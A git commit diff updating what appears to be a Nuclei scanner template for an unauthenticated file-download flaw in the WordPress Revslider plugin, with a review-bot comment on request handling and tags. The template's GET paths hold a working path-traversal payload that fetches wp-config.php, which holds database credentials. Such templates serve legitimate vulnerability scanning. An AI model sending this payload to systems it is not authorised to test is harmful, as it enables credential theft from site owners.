Update wp-revslider-file-download.yaml

patch-1
pussycat0x 2021-11-22 20:29:59 +05:30 committed by GitHub
parent ba3d453744
commit a8ee7e2ddf
1 changed files with 7 additions and 1 deletions


@ -1,4 +1,6 @@
id: wp-revslider-file-download
info:
name: Wordpress Revslider - Unauthenticated Arbitrary File Download
author: pussycat0x
@ -10,11 +12,15 @@ info:
- https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
- https://cxsecurity.com/issue/WLB-2021090129
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
- '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
matchers-condition: and
matchers:
- type: word
@ -25,4 +31,4 @@ requests:
condition: and
- type: status
status:
- 200
- 200
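Review bot: The second path added to the request (the `/blog/wp-admin/admin-ajax.php` variant) is always sent even when the first path has already matched, since nothing in the request block short-circuits; adding `stop-at-first-match: true` next to `matchers-condition: and` keeps the template to a single confirming request per host. The `words` list of the word matcher falls outside the visible hunks, so I can't confirm what it keys on, but combining it with `status: 200` under an `and` condition is the right shape and should stay that way. Consider extending `tags: wordpress,wp-plugin,lfi` with `revslider` so the template can be selected by plugin name, matching how other plugin templates are tagged. The `info` block's middle lines and the matcher body are not shown in these hunks, so this note only covers what is visible.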